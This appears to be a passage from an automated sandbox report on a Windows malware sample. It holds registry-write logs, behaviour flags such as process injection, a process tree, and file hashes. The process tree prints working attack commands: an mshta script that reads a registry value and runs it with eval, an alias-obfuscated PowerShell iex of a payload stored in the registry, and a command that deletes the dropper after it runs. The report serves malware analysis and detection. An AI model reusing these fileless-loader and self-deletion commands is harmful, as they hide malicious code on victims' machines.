\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\11235a8e-ca14-4930-b = "\\\\?\\Volume{68140B53-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\c20b0500d4d703fd4989338147939c7cd9ff5fb23b6da75c00072ecf75810b49" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7fb2b740-d302-4746-8 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\71e7fd97-cff7-43cf-b = "0" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\1418739b-869b-4dcf-9 RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6dcaf763-0987-4d15-9 = "8324" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\da34fe7b-022b-4fa4-a = "8324" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\11235a8e-ca14-4930-b RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6dcaf763-0987-4d15-9 = "0" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\da34fe7b-022b-4fa4-a = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000c3c3d6ce49fcd901cdc800d049fcd901cdc800d049fcd90148ea02000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000004b57396e2000303034373831643863623036666162343536323436366636636337666336666633373930363061613864336438303130613764333431613839356636656135640000b20009000400efbe4b57396e4b57396e2e00000000000000000000000000000000000000000000000000c3c81701300030003400370038003100640038006300620030003600660061006200340035003600320034003600360066003600630063003700660063003600660066003300370039003000360030006100610038006400330064003800300031003000610037006400330034003100610038003900350066003600650061003500640000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000315741351000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c30303437383164386362303666616234353632343636663663633766633666663337393036306161386433643830313061376433343161383935663665613564000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a05800000000000000736d696a776a6d68000000000000000052d8063eedfcdf448a23f9f8aed1bb8a248eddba9b53ee11941efeac1aa3586552d8063eedfcdf448a23f9f8aed1bb8a248eddba9b53ee11941efeac1aa35865ce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002d00000053002d0031002d0035002d00320031002d003900310039003200350034003400390032002d0033003900370039003200390033003900390037002d003700360034003400300037003100390032002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000530b1468000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\95341f58-63c7-4a52-a RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\95341f58-63c7-4a52-a RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\95341f58-63c7-4a52-a = 98f9b1cd49fcd901 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\95341f58-63c7-4a52-a = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\71e7fd97-cff7-43cf-b RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\da34fe7b-022b-4fa4-a RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\da34fe7b-022b-4fa4-a = "0" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b3a096e6-1522-4213-b = 841f4ed149fcd901 RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\f0a7b0dd-8a0e-4522-b RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\1418739b-869b-4dcf-9 = 4d35bdcc49fcd901 RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b3a096e6-1522-4213-b = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000a2ed07d049fcd90188229ed049fcd90188229ed049fcd901ba2504000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000004b57396e2000643835656561373232303939343135653235666566393634616239313061373735303634333638306636343265383331346564373036363061313961303134310000b20009000400efbe4b57396e4b57396e2e00000000000000000000000000000000000000000000000000c2f92600640038003500650065006100370032003200300039003900340031003500650032003500660065006600390036003400610062003900310030006100370037003500300036003400330036003800300066003600340032006500380033003100340065006400370030003600360030006100310039006100300031003400310000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000315741351000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c64383565656137323230393934313565323566656639363461623931306137373530363433363830663634326538333134656437303636306131396130313431000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a05800000000000000736d696a776a6d68000000000000000052d8063eedfcdf448a23f9f8aed1bb8a258eddba9b53ee11941efeac1aa3586552d8063eedfcdf448a23f9f8aed1bb8a258eddba9b53ee11941efeac1aa35865ce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002d00000053002d0031002d0035002d00320031002d003900310039003200350034003400390032002d0033003900370039003200390033003900390037002d003700360034003400300037003100390032002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000530b1468000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\fb8126d2-276c-439d-a RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\71e7fd97-cff7-43cf-b = "\\\\?\\Volume{68140B53-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\c20b0500d4d703fd4989338147939c7cd9ff5fb23b6da75c00072ecf75810b49" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\71e7fd97-cff7-43cf-b = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000c9134ace49fcd901f60afccf49fcd901f60afccf49fcd901befc05000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000004b57396e2000633230623035303064346437303366643439383933333831343739333963376364396666356662323362366461373563303030373265636637353831306234390000b20009000400efbe4b57396e4b57396e2e00000000000000000000000000000000000000000000000000e15d0a00630032003000620030003500300030006400340064003700300033006600640034003900380039003300330038003100340037003900330039006300370063006400390066006600350066006200320033006200360064006100370035006300300030003000370032006500630066003700350038003100300062003400390000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000315741351000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c63323062303530306434643730336664343938393333383134373933396337636439666635666232336236646137356330303037326563663735383130623439000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a05800000000000000736d696a776a6d68000000000000000052d8063eedfcdf448a23f9f8aed1bb8a218eddba9b53ee11941efeac1aa3586552d8063eedfcdf448a23f9f8aed1bb8a218eddba9b53ee11941efeac1aa35865ce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002d00000053002d0031002d0035002d00320031002d003900310039003200350034003400390032002d0033003900370039003200390033003900390037002d003700360034003400300037003100390032002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000530b1468000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\f30d5ed8-f703-40a2-b RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\95341f58-63c7-4a52-a = "8324" RuntimeBroker.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
PING.EXEpid process 2160 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
Client.exepowershell.exeExplorer.EXEpid process 3660 Client.exe 3660 Client.exe 2916 powershell.exe 2916 powershell.exe 2916 powershell.exe 3188 Explorer.EXE 3188 Explorer.EXE 3188 Explorer.EXE 3188 Explorer.EXE 3188 Explorer.EXE 3188 Explorer.EXE 3188 Explorer.EXE 3188 Explorer.EXE 3188 Explorer.EXE 3188 Explorer.EXE 3188 Explorer.EXE 3188 Explorer.EXE 3188 Explorer.EXE 3188 Explorer.EXE 3188 Explorer.EXE 3188 Explorer.EXE 3188 Explorer.EXE 3188 Explorer.EXE 3188 Explorer.EXE 3188 Explorer.EXE 3188 Explorer.EXE 3188 Explorer.EXE 3188 Explorer.EXE 3188 Explorer.EXE 3188 Explorer.EXE 3188 Explorer.EXE 3188 Explorer.EXE 3188 Explorer.EXE 3188 Explorer.EXE 3188 Explorer.EXE 3188 Explorer.EXE 3188 Explorer.EXE 3188 Explorer.EXE 3188 Explorer.EXE 3188 Explorer.EXE 3188 Explorer.EXE 3188 Explorer.EXE 3188 Explorer.EXE 3188 Explorer.EXE 3188 Explorer.EXE 3188 Explorer.EXE 3188 Explorer.EXE 3188 Explorer.EXE 3188 Explorer.EXE 3188 Explorer.EXE 3188 Explorer.EXE 3188 Explorer.EXE 3188 Explorer.EXE 3188 Explorer.EXE 3188 Explorer.EXE 3188 Explorer.EXE 3188 Explorer.EXE 3188 Explorer.EXE 3188 Explorer.EXE 3188 Explorer.EXE 3188 Explorer.EXE 3188 Explorer.EXE 3188 Explorer.EXE 3188 Explorer.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
Explorer.EXEpid process 3188 Explorer.EXE -
Suspicious behavior: MapViewOfSection 8 IoCs
Processes:
powershell.exeExplorer.EXEcmd.exepid process 2916 powershell.exe 3188 Explorer.EXE 3188 Explorer.EXE 3188 Explorer.EXE 3188 Explorer.EXE 3188 Explorer.EXE 3188 Explorer.EXE 2684 cmd.exe -
Suspicious use of AdjustPrivilegeToken 11 IoCs
Processes:
powershell.exeExplorer.EXERuntimeBroker.exedescription pid process Token: SeDebugPrivilege 2916 powershell.exe Token: SeShutdownPrivilege 3188 Explorer.EXE Token: SeCreatePagefilePrivilege 3188 Explorer.EXE Token: SeShutdownPrivilege 3188 Explorer.EXE Token: SeCreatePagefilePrivilege 3188 Explorer.EXE Token: SeShutdownPrivilege 3188 Explorer.EXE Token: SeCreatePagefilePrivilege 3188 Explorer.EXE Token: SeShutdownPrivilege 3804 RuntimeBroker.exe Token: SeShutdownPrivilege 3804 RuntimeBroker.exe Token: SeShutdownPrivilege 3188 Explorer.EXE Token: SeCreatePagefilePrivilege 3188 Explorer.EXE -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
Explorer.EXEpid process 3188 Explorer.EXE -
Suspicious use of UnmapMainImage 1 IoCs
Processes:
Explorer.EXEpid process 3188 Explorer.EXE -
Suspicious use of WriteProcessMemory 46 IoCs
Processes:
mshta.exepowershell.execsc.execsc.exeExplorer.EXEcmd.exedescription pid process target process PID 4988 wrote to memory of 2916 4988 mshta.exe powershell.exe PID 4988 wrote to memory of 2916 4988 mshta.exe powershell.exe PID 2916 wrote to memory of 4100 2916 powershell.exe csc.exe PID 2916 wrote to memory of 4100 2916 powershell.exe csc.exe PID 4100 wrote to memory of 1704 4100 csc.exe cvtres.exe PID 4100 wrote to memory of 1704 4100 csc.exe cvtres.exe PID 2916 wrote to memory of 1496 2916 powershell.exe csc.exe PID 2916 wrote to memory of 1496 2916 powershell.exe csc.exe PID 1496 wrote to memory of 5048 1496 csc.exe cvtres.exe PID 1496 wrote to memory of 5048 1496 csc.exe cvtres.exe PID 2916 wrote to memory of 3188 2916 powershell.exe Explorer.EXE PID 2916 wrote to memory of 3188 2916 powershell.exe Explorer.EXE PID 2916 wrote to memory of 3188 2916 powershell.exe Explorer.EXE PID 2916 wrote to memory of 3188 2916 powershell.exe Explorer.EXE PID 3188 wrote to memory of 3804 3188 Explorer.EXE RuntimeBroker.exe PID 3188 wrote to memory of 3804 3188 Explorer.EXE RuntimeBroker.exe PID 3188 wrote to memory of 3804 3188 Explorer.EXE RuntimeBroker.exe PID 3188 wrote to memory of 3804 3188 Explorer.EXE RuntimeBroker.exe PID 3188 wrote to memory of 4024 3188 Explorer.EXE RuntimeBroker.exe PID 3188 wrote to memory of 4024 3188 Explorer.EXE RuntimeBroker.exe PID 3188 wrote to memory of 4024 3188 Explorer.EXE RuntimeBroker.exe PID 3188 wrote to memory of 4024 3188 Explorer.EXE RuntimeBroker.exe PID 3188 wrote to memory of 1912 3188 Explorer.EXE RuntimeBroker.exe PID 3188 wrote to memory of 1912 3188 Explorer.EXE RuntimeBroker.exe PID 3188 wrote to memory of 1912 3188 Explorer.EXE RuntimeBroker.exe PID 3188 wrote to memory of 1912 3188 Explorer.EXE RuntimeBroker.exe PID 3188 wrote to memory of 4208 3188 Explorer.EXE RuntimeBroker.exe PID 3188 wrote to memory of 4208 3188 Explorer.EXE RuntimeBroker.exe PID 3188 wrote to memory of 4208 3188 Explorer.EXE RuntimeBroker.exe PID 3188 wrote to memory of 4208 3188 Explorer.EXE RuntimeBroker.exe PID 3188 wrote to memory of 2684 3188 Explorer.EXE cmd.exe PID 3188 wrote to memory of 2684 3188 Explorer.EXE cmd.exe PID 3188 wrote to memory of 2684 3188 Explorer.EXE cmd.exe PID 3188 wrote to memory of 1684 3188 Explorer.EXE cmd.exe PID 3188 wrote to memory of 1684 3188 Explorer.EXE cmd.exe PID 3188 wrote to memory of 1684 3188 Explorer.EXE cmd.exe PID 3188 wrote to memory of 1684 3188 Explorer.EXE cmd.exe PID 3188 wrote to memory of 2684 3188 Explorer.EXE cmd.exe PID 3188 wrote to memory of 2684 3188 Explorer.EXE cmd.exe PID 3188 wrote to memory of 1684 3188 Explorer.EXE cmd.exe PID 3188 wrote to memory of 1684 3188 Explorer.EXE cmd.exe PID 2684 wrote to memory of 2160 2684 cmd.exe PING.EXE PID 2684 wrote to memory of 2160 2684 cmd.exe PING.EXE PID 2684 wrote to memory of 2160 2684 cmd.exe PING.EXE PID 2684 wrote to memory of 2160 2684 cmd.exe PING.EXE PID 2684 wrote to memory of 2160 2684 cmd.exe PING.EXE
Processes
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3804
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:1912
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4024
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of UnmapMainImage
- Suspicious use of WriteProcessMemory
PID:3188 -
C:\Users\Admin\AppData\Local\Temp\Client.exe"C:\Users\Admin\AppData\Local\Temp\Client.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3660
-
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" "about:<hta:application><script>Mfat='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Mfat).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\2B8EB0FA-8E4D-9577-F08F-A2992433F6DD\\\LinkActive'));if(!window.flag)close()</script>"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4988 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name ydgiltpsjv -value gp; new-alias -name uwcqsq -value iex; uwcqsq ([System.Text.Encoding]::ASCII.GetString((ydgiltpsjv "HKCU:Software\AppDataLow\Software\Microsoft\2B8EB0FA-8E4D-9577-F08F-A2992433F6DD").PlayPlay))3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2916 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\cf1dzey5\cf1dzey5.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:4100 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8F99.tmp" "c:\Users\Admin\AppData\Local\Temp\cf1dzey5\CSCD509E10B67544FA6B739E47ED1A01BC.TMP"5⤵PID:1704
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ourpigx2\ourpigx2.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:1496 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES90C2.tmp" "c:\Users\Admin\AppData\Local\Temp\ourpigx2\CSC4753AF1A44B7477984EE675B6D90CA5C.TMP"5⤵PID:5048
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\Client.exe"2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:2684 -
C:\Windows\system32\PING.EXEping localhost -n 53⤵
- Runs ping.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2160
-
-
-
C:\Windows\syswow64\cmd.exe"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,2⤵PID:1684
-
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Modifies registry class
PID:4208
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5041a447ed7472a863b7a2790420caec8
SHA13ab077396278fe0aef09abc4e29554b419425070
SHA2565e1c72c77d3b124e15e7393d58b8cfbd68fc80f908af3a0edabe94631c3a61e2
SHA512bc015fc882d04b5e0e2bfdb60e9b9493c3f393502aeb39196f1f744113647456e774bcc89d4d4c9436946bfd1f98a25331e912c588a5531a8c8889d9fd01d228
-
Filesize
1KB
MD5ff000e8e382c18849c7f85976f31082a
SHA1424b10e0a4b876fe713f8a75af0e1b6d98c0a52c
SHA256f35890e29a12ae2d1d6fd4a1703bde48a65145691554c89cb30db52b19ac7a1a
